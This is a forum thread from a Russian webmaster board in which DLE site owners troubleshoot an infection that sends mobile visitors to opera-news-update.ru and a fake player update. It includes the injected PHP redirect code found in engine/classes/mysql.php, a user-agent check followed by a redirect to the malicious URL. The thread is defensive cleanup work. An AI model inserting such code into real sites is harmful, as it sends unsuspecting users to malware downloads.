Вирус на ДЛЕ сайтах
Страницы: 1 2 След.
[ Закрыто ] Вирус на ДЛЕ сайтах
Здравствуйте. Несколько моих сайтов на ДЛЕ заразились вирусом. Не могу точно определить, что за вирус и как с ним разобраться.
Во первых когда захожу на сайт с планшета на андроиде, меня редиректит на сайт opera-news-update.ru, где понятное дело мне предлагают обновить "Flow Player".

Во вторых на сайты реагирует антивирус ЕСЕТ, вердикт - вирус scrinject.b.gen, яша уже тоже заметил вирус на одном сайте, его вердикт - поведенческий анализ.

Кто знает, как исправить, помогите пожалуйста!
Дмитрий Димбровский, давайте в личку поподробнее
Открой свой магазин за 5 минут, их товары, их обслуживание, с тебя только клиенты >>> РЕГИСТРАЦИЯ <<<
Скрин выплат по запросу.
Рефералам помощь.
Дмитрий Димбровский, чистить все все файлы. Обновить двиг до 9.7 минимум + поставить патч безопасности
Не насиловать мозг. 
Самое безболезненное - перезалить поверх имеющихся (с заменой файлов)  файлы движка. 
Если не поможет (что маловероятно) искать проблему в шаблоне.
Цитата
mozambik пишет:
искать проблему в шаблоне
нет у него проблемы в шаблоне, страницы чистые, редиректит изнутри, но хеатсесс тоже чистый
Переустановите движок, восстановите файлы которые нужны для корректной работы сайта, енджи пхп оптионс и тп.  Я так чистил.
в  dbconfig.php или config.php была ведь тема уже
бр бр бр
Я переустанавливал, но у меня были бэкапы файлов и бд, обязательно делайте бэкапы.
Цитата
TEJlO11 пишет:
в dbconfig.php или config.php была ведь тема уже
там чисто
Если на хостинге не один домен, то они все будут редиректить если у основного домена в хеатсесс редирект засел. Я так тоже мучился, еле нашел причину
Обнови движок, как писали выше. И не медли с этим, я успел АГС получить пока разбирался с этой бодягой.
Все разобрался... smile:)

И так редирект мобильных устройств на сайт opera-news-update.ru, где понятное дело предлагается скачать вирусное приложение!

Чтобы отыскать вирус я юзнул тотал командер и сразу нашел ссылку на сайт вредитель.

Путь к зараженному файлу - /engine/classes/mysql.php
Сам код вируса выглядит вот так:

Код
$useragent=$_SERVER['HTTP_USER_AGENT'];
if(preg_match('/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge|maemo|midp|mmp|operam(ob|in)i|palm(os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows(ce|phone)|xda|xiino/i',$useragent)||preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|awa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r|s)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(i|ip)|hs\-c|ht(c(\-||_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(|\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(|\/)|klon|kpt|kwc\-|kyo(c|k)|le(no|xi)|lg(g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-||o|v)|zz)|mt(50|p1|v)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|)|webc|whit|wi(g|nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i',substr($useragent,0,4))){
header("Location: http://opera-news-update.ru/s/11011"); 
exit; 
}
п.с.
Всем большое спасибо за ответы. Отдельное спасибо Алексей SP, за его поддержку и дельные советы!
Не понимаю!Странные люди.
Не куда время девать? Ни своё, ни чужое?
Как минимум- пару часов на поиск и устранение.
Либо 5 минут на перезаливку файлов движка.
Эффект равнозначный.
Лёгкий путь нам ни к чему?!...smile:wall:
К тому же не факт, что обнаруженный код, единственный на сайте.
Изменено: mozambik - 19 Апреля 2013 21:42
А вы не подумали о том, что к примеру у меня сделаны куча хаков и модов? Они мне все нужны и я давно уже не помню в каких файлах я что то менял. Если я перезалью файлы движка, что будет с ними? Понятно что...
Цитата
mazesk пишет:
А вы не подумали о том, что к примеру у меня сделаны куча хаков и модов? Они мне все нужны и я давно уже не помню в каких файлах я что то менял. Если я перезалью файлы движка, что будет с ними? Понятно что...
Я, прежде чем что-либо написать, всегда думаю. Скажите, когда Вы устанавливаете хаки, моды - Вы вносите изменения в папку engine?
А именно эту папку требуется перезалить в первую очередь при обнаружении стороннего кода на сайте.
Речь не о переустановке движка, а о перезаливке файлов поверх существующих.
При перезаливке файлов движка, все сторонние файлы остаются не тронутыми
Вместо того, чтобы тратить время на поиск бяки, рациональнее  потратить время на устранение причин возникновения бяки.
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
17:03 Устали от Пустых Обещаний? Market-Place.su даёт реальные деньги! 
15:08 Стоит ли добавлять сайт в Rambler топ 100? 
14:14 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
19:33 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
09:02 Как продвигать сайт с неуникальным контентом 
08:57 Absence в Армении 
14:50 Индексация страниц 
22:05 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
20:56 Cryptonet.pro - быстрый и надежный обмен электронных валют! 
16:58 PonyBit.ru - обменный пункт PonyBit.ru (Понибит.ру) 
14:30 SwapPix.io - быстрый и безопасный обменник криптовалют. 
13:55 Обменник криптовалюты OnlyCrypto 
13:36 Affiliate Top - партнерская программа нового уровня 
10:29 local-pay.com - быстрый и надежный обменник криптовалюты Local-Pay 
22:28 Ну что, кто куда деваете свои сайты? 
20:48 Точные прогнозы на футбол 
22:09 Добро пожаловать в цифровой мир... 
19:42 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор 
22:08 Накрутка поисковых подсказок 
14:01 Union Pharm - топовая фарма-партнерка для профессионалов! 
10:59 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди